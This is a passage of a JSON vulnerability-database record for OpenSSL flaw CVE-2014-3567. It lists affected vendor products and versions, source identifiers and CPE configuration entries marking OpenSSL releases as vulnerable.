        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "packetshaper",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "9.2"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.10"
      },
      {
        "model": "aspera orchestrator",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "2.10"
      },
      {
        "model": "flex system fc3171 8gb san switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.2"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "6.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.5.1.3"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.4"
      },
      {
        "model": "systems director common agent for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.3"
      },
      {
        "model": "project openssl 1.0.0n",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.0"
      },
      {
        "model": "insight control server provisioning 7.4.0a",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "insight control server provisioning",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4.1"
      },
      {
        "model": "aura session manager sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.4.0"
      },
      {
        "model": "sterling connect:enterprise http option",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4"
      },
      {
        "model": "ei switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "51300"
      },
      {
        "model": "security network intrusion prevention system gx6116",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "cognos tm1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2"
      },
      {
        "model": "y",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59200"
      },
      {
        "model": "u",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "insight control",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.1"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.4.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.3.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.34"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.0"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "flex system chassis management module 2.5.3t",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "l",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "security network intrusion prevention system gx5208",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v3500-"
      },
      {
        "model": "server migration pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5"
      },
      {
        "model": "security network intrusion prevention system gx4004-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.2.2"
      },
      {
        "model": "security network intrusion prevention system gx5008-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "m220",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "56002"
      },
      {
        "model": "project openssl 1.0.0h",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0"
      },
      {
        "model": "security network intrusion prevention system gx7800",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "insight control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5"
      },
      {
        "model": "security network intrusion prevention system gx6116",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "flex system chassis management module 1.0.0",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "tivoli netcool/system service monitor fp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "imc wsm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.9.5"
      },
      {
        "model": "cognos controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.1"
      },
      {
        "model": "sterling b2b integrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "aspera ondemand for amazon",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "0"
      },
      {
        "model": "msm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.36.3.1.0"
      },
      {
        "model": "sdk for node.js",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.9"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.2"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "aura system manager sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "security network intrusion prevention system gx5208-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "project openssl 0.9.8o",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "sdk for node.js",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.2"
      },
      {
        "model": "server migration pack",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.1"
      },
      {
        "model": "bladecenter -h",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1886"
      },
      {
        "model": "project openssl 1.0.1b",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "project openssl 1.0.0k",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v3700-"
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "59000"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.0"
      },
      {
        "model": "security network intrusion prevention system gx7412",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.0.5"
      },
      {
        "model": "security network intrusion prevention system gx4004",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.2"
      },
      {
        "model": "msr2000",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.1"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "tivoli netcool/system service monitor fp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "centos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "centos",
        "version": "6"
      },
      {
        "model": "qradar siem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.3"
      },
      {
        "model": "security network intrusion prevention system gx5208-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "cognos controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1"
      },
      {
        "model": "tivoli netcool/system service monitor fp7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "aura utility services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "sterling b2b integrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.0.1"
      },
      {
        "model": "bladecenter -e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8677"
      },
      {
        "model": "nextscale n1200 enclosure fan power controller fhet17a-2.02",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "upward integration modules for vmware vsphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.5.2"
      },
      {
        "model": "cognos controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2"
      },
      {
        "model": "systems director common agent for linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.2"
      },
      {
        "model": "tivoli composite application manager for transactions",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3.0"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.8.5"
      },
      {
        "model": "malware analyzer g2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "4.1"
      },
      {
        "model": "linux",
        "scope": null,
        "trust": 0.3,
        "vendor": "gentoo",
        "version": null
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.2.1"
      },
      {
        "model": "f",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "nextscale n1200 enclosure fan power controller fhet24j-2.10",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "aspera enterprise server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.5.2"
      },
      {
        "model": "project openssl 0.9.8s",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx4002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.0"
      },
      {
        "model": "security network intrusion prevention system gx5208",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "qradar risk manager mr2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "security network intrusion prevention system gx5108",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "security network intrusion prevention system gx7412-10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "proxysg sgos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.2"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "switch series r1005p15",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "12900"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.3.0"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.2.5"
      },
      {
        "model": "security network intrusion prevention system gx4004",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "aura utility services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "office connect p",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "18100"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "6.0.1"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "aspera orchestrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "0"
      },
      {
        "model": "norman shark industrial control system protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "5.0"
      },
      {
        "model": "infosphere information server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.1"
      },
      {
        "model": "norman shark network protection",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "5.2.3"
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "13.37"
      },
      {
        "model": "netscaler service delivery appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "tivoli provisioning manager for os deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1"
      },
      {
        "model": "oneview",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.20"
      },
      {
        "model": "matrix operating environment",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.1"
      },
      {
        "model": "project openssl beta2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.1"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.1"
      },
      {
        "model": "oneview",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.10"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.3"
      },
      {
        "model": "infosphere master data management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "11.4"
      },
      {
        "model": "nextscale n1200 enclosure fan power controller fhet24g-2.09",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx7800",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "manager for sle sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "111.7"
      },
      {
        "model": "studio onsite",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "1.3"
      },
      {
        "model": "security network intrusion prevention system gx4004-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.4"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.6"
      },
      {
        "model": "cloudsystem matrix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.2"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "5.0.8"
      },
      {
        "model": "cloudsystem foundation",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.1.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "infosphere information server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.7"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.0.0"
      },
      {
        "model": "insight control server deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "security network intrusion prevention system gx5008",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "10.0"
      },
      {
        "model": "office connect pl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "18100"
      },
      {
        "model": "content analysis system",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.2.3.1"
      },
      {
        "model": "security network intrusion prevention system gx6116",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "reporter\u0027s iso",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "9.4"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "5.0.3"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.0"
      },
      {
        "model": "oneview",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.05"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.3"
      },
      {
        "model": "systems insight manager 7.4.0a",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.2"
      },
      {
        "model": "t",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "security network intrusion prevention system gx7800",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "upward integration modules for vmware vsphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.5.1"
      },
      {
        "model": "security network intrusion prevention system gx4004",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "vsr1000 r0204p01",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.4"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "8.4"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.4"
      },
      {
        "model": "storage provisioning manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.3"
      },
      {
        "model": "flex system en6131 40gb ethernet switch",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.4.1110"
      },
      {
        "model": "security virtual server protection for vmware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.1"
      },
      {
        "model": "ssl for openvms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.4-476"
      },
      {
        "model": "switch series r2311p05",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5920"
      },
      {
        "model": "aspera point to point",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.5.2"
      },
      {
        "model": "insight control server provisioning",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4.1"
      },
      {
        "model": "tivoli provisioning manager for images system edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x7.1.1.0"
      },
      {
        "model": "systems director common agent for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.2"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "9.1"
      },
      {
        "model": "security analytics platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "7.1"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.3.3"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "project openssl 1.0.1h",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "cognos tm1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.1.1"
      },
      {
        "model": "ei switch series r3108p03",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5130"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.0"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "70586"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201410-636"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-3567"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0n:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta4:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "0.9.8zb",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta5:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*",
